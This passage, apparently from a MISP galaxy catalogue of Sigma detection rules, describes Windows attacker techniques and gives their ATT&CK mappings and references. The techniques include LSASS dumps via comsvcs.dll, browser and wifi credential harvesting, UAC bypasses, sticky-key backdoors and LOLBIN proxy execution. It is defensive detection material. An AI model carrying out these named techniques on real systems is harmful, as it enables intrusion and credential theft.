https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml

Chopper Webshell Process Pattern

Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells

The tag is: misp-galaxy:sigma-rules="Chopper Webshell Process Pattern"

Chopper Webshell Process Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 10472. Table References

Links

https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml

Potential Binary Proxy Execution Via VSDiagnostics.EXE

Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.

The tag is: misp-galaxy:sigma-rules="Potential Binary Proxy Execution Via VSDiagnostics.EXE"

Potential Binary Proxy Execution Via VSDiagnostics.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10473. Table References

Links

https://twitter.com/0xBoku/status/1679200664013135872

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml

Potential Signing Bypass Via Windows Developer Features

Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.

The tag is: misp-galaxy:sigma-rules="Potential Signing Bypass Via Windows Developer Features"

Table 10474. Table References

Links

Internal Research[Internal Research]

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml

Process Memory Dump Via Comsvcs.DLL

Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)

The tag is: misp-galaxy:sigma-rules="Process Memory Dump Via Comsvcs.DLL"

Process Memory Dump Via Comsvcs.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10475. Table References

Links

https://twitter.com/Wietze/status/1542107456507203586

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

https://twitter.com/pythonresponder/status/1385064506049630211?s=21

https://twitter.com/SBousseaden/status/1167417096374050817

https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py

https://twitter.com/shantanukhande/status/1229348874298388484

https://twitter.com/Hexacorn/status/1224848930795552769

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml

PUA - WebBrowserPassView Execution

Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera

The tag is: misp-galaxy:sigma-rules="PUA - WebBrowserPassView Execution"

PUA - WebBrowserPassView Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 10476. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml

User Discovery And Export Via Get-ADUser Cmdlet

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file

The tag is: misp-galaxy:sigma-rules="User Discovery And Export Via Get-ADUser Cmdlet"

User Discovery And Export Via Get-ADUser Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10477. Table References

Links

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml

Potential Defense Evasion Via Rename Of Highly Relevant Binaries

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Rename Of Highly Relevant Binaries"

Potential Defense Evasion Via Rename Of Highly Relevant Binaries has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10478. Table References

Links

https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html

https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

https://twitter.com/christophetd/status/1164506034720952320

https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml

HackTool - SafetyKatz Execution

Detects the execution of the hacktool SafetyKatz via PE information and default Image name

The tag is: misp-galaxy:sigma-rules="HackTool - SafetyKatz Execution"

HackTool - SafetyKatz Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10479. Table References

Links

https://github.com/GhostPack/SafetyKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml

Harvesting Of Wifi Credentials Via Netsh.EXE

Detect the harvesting of wifi credentials using netsh.exe

The tag is: misp-galaxy:sigma-rules="Harvesting Of Wifi Credentials Via Netsh.EXE"

Harvesting Of Wifi Credentials Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10480. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml

PUA - Advanced IP Scanner Execution

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

The tag is: misp-galaxy:sigma-rules="PUA - Advanced IP Scanner Execution"

PUA - Advanced IP Scanner Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 10481. Table References

Links

https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer

https://labs.f-secure.com/blog/prelude-to-ransomware-systembc

https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner

https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml

IIS Native-Code Module Command Line Installation

Detects suspicious IIS native-code module installations via command line

The tag is: misp-galaxy:sigma-rules="IIS Native-Code Module Command Line Installation"

IIS Native-Code Module Command Line Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 10482. Table References

Links

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml

Potentially Suspicious Rundll32 Activity

Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Rundll32 Activity"

Potentially Suspicious Rundll32 Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10483. Table References

Links

https://twitter.com/nas_bench/status/1433344116071583746

http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

https://twitter.com/eral4m/status/1479080793003671557

https://twitter.com/Hexacorn/status/885258886428725250

https://twitter.com/eral4m/status/1479106975967240209

https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml

Suspicious SYSVOL Domain Group Policy Access

Detects Access to Domain Group Policies stored in SYSVOL

The tag is: misp-galaxy:sigma-rules="Suspicious SYSVOL Domain Group Policy Access"

Suspicious SYSVOL Domain Group Policy Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10484. Table References

Links

https://adsecurity.org/?p=2288

https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml

Exports Critical Registry Keys To a File

Detects the export of a crital Registry key to a file.

The tag is: misp-galaxy:sigma-rules="Exports Critical Registry Keys To a File"

Exports Critical Registry Keys To a File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 10485. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml

Wab/Wabmig Unusual Parent Or Child Processes

Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity

The tag is: misp-galaxy:sigma-rules="Wab/Wabmig Unusual Parent Or Child Processes"

Table 10486. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml

HackTool - Windows Credential Editor (WCE) Execution

Detects the use of Windows Credential Editor (WCE)

The tag is: misp-galaxy:sigma-rules="HackTool - Windows Credential Editor (WCE) Execution"

HackTool - Windows Credential Editor (WCE) Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10487. Table References

Links

https://www.ampliasecurity.com/research/windows-credentials-editor/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wce.yml

Suspicious ZipExec Execution

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

The tag is: misp-galaxy:sigma-rules="Suspicious ZipExec Execution"

Suspicious ZipExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10488. Table References

Links

https://twitter.com/SBousseaden/status/1451237393017839616

https://github.com/Tylous/ZipExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml

Execute Code with Pester.bat as Parent

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

The tag is: misp-galaxy:sigma-rules="Execute Code with Pester.bat as Parent"

Execute Code with Pester.bat as Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10489. Table References

Links

https://twitter.com/Oddvarmoe/status/993383596244258816

https://twitter.com/st0pp3r/status/1560072680887525378

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester.yml

Explorer NOUACCHECK Flag

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks

The tag is: misp-galaxy:sigma-rules="Explorer NOUACCHECK Flag"

Explorer NOUACCHECK Flag has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10490. Table References

Links

https://twitter.com/ORCA6665/status/1496478087244095491

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml

XBAP Execution From Uncommon Locations Via PresentationHost.EXE

Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL

The tag is: misp-galaxy:sigma-rules="XBAP Execution From Uncommon Locations Via PresentationHost.EXE"

XBAP Execution From Uncommon Locations Via PresentationHost.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10491. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml

Set Suspicious Files as System Files Using Attrib.EXE

Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs

The tag is: misp-galaxy:sigma-rules="Set Suspicious Files as System Files Using Attrib.EXE"

Set Suspicious Files as System Files Using Attrib.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10492. Table References

Links

https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4

https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml

User Added To Highly Privileged Group

Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".

The tag is: misp-galaxy:sigma-rules="User Added To Highly Privileged Group"

User Added To Highly Privileged Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 10493. Table References

Links

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml

Suspicious Debugger Registration Cmdline

Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).

The tag is: misp-galaxy:sigma-rules="Suspicious Debugger Registration Cmdline"

Suspicious Debugger Registration Cmdline has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10494. Table References

Links

https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/

https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml

Potential Remote Desktop Tunneling

Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.

The tag is: misp-galaxy:sigma-rules="Potential Remote Desktop Tunneling"

Potential Remote Desktop Tunneling has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 10495. Table References

Links

https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml

Potential Defense Evasion Via Binary Rename

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Binary Rename"

Potential Defense Evasion Via Binary Rename has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10496. Table References

Links

https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html

https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml

User Added to Remote Desktop Users Group

Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".

The tag is: misp-galaxy:sigma-rules="User Added to Remote Desktop Users Group"

User Added to Remote Desktop Users Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10497. Table References

Links

https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml

Control Panel Items

Detects the malicious use of a control panel item

The tag is: misp-galaxy:sigma-rules="Control Panel Items"

Control Panel Items has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 10498. Table References

Links

https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml

Arbitrary MSI Download Via Devinit.EXE

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

The tag is: misp-galaxy:sigma-rules="Arbitrary MSI Download Via Devinit.EXE"

Arbitrary MSI Download Via Devinit.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10499. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/

https://twitter.com/mrd0x/status/1460815932402679809

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml

Suspicious AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.

The tag is: misp-galaxy:sigma-rules="Suspicious AddinUtil.EXE CommandLine Execution"

Suspicious AddinUtil.EXE CommandLine Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10500. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml

Potential Persistence Via Microsoft Compatibility Appraiser

Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Microsoft Compatibility Appraiser"

Potential Persistence Via Microsoft Compatibility Appraiser has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10501. Table References

Links

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution

Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

The tag is: misp-galaxy:sigma-rules="Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution"

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10502. Table References

Links

https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5

https://twitter.com/mrd0x/status/1463526834918854661

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml

Suspicious AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument

The tag is: misp-galaxy:sigma-rules="Suspicious AgentExecutor PowerShell Execution"

Suspicious AgentExecutor PowerShell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10503. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/

https://twitter.com/jseerden/status/1247985304667066373/photo/1

https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension

https://twitter.com/lefterispan/status/1286259016436514816

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml

Suspicious HWP Sub Processes

Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious HWP Sub Processes"

Suspicious HWP Sub Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10504. Table References

Links

https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/

https://blog.alyac.co.kr/1901

https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1

https://twitter.com/cyberwar_15/status/1187287262054076416

https://en.wikipedia.org/wiki/Hangul_(word_processor)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml

UAC Bypass via Windows Firewall Snap-In Hijack

Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in

The tag is: misp-galaxy:sigma-rules="UAC Bypass via Windows Firewall Snap-In Hijack"

UAC Bypass via Windows Firewall Snap-In Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 10505. Table References

Links

https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml

Suspicious Query of MachineGUID

Use of reg to get MachineGuid information

The tag is: misp-galaxy:sigma-rules="Suspicious Query of MachineGUID"

Suspicious Query of MachineGUID has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10506. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_machineguid.yml

InfDefaultInstall.exe .inf Execution

Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

The tag is: misp-galaxy:sigma-rules="InfDefaultInstall.exe .inf Execution"

InfDefaultInstall.exe .inf Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10507. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml

Windows Share Mount Via Net.EXE

Detects when a share is mounted using the "net.exe" utility

The tag is: misp-galaxy:sigma-rules="Windows Share Mount Via Net.EXE"

Windows Share Mount Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10508. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location"

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"

Table 10509. Table References

Links

https://www.fortiguard.com/threat-signal-report/4718?s=09

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml

DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.

The tag is: misp-galaxy:sigma-rules="DLL Loaded via CertOC.EXE"

DLL Loaded via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10510. Table References

Links

https://twitter.com/sblmsrsn/status/1445758411803480072?s=20

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml

New Virtual Smart Card Created Via TpmVscMgr.EXE

Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.

The tag is: misp-galaxy:sigma-rules="New Virtual Smart Card Created Via TpmVscMgr.EXE"

Table 10511. Table References

Links

https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml

WinDbg/CDB LOLBIN Usage

Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file

The tag is: misp-galaxy:sigma-rules="WinDbg/CDB LOLBIN Usage"

WinDbg/CDB LOLBIN Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

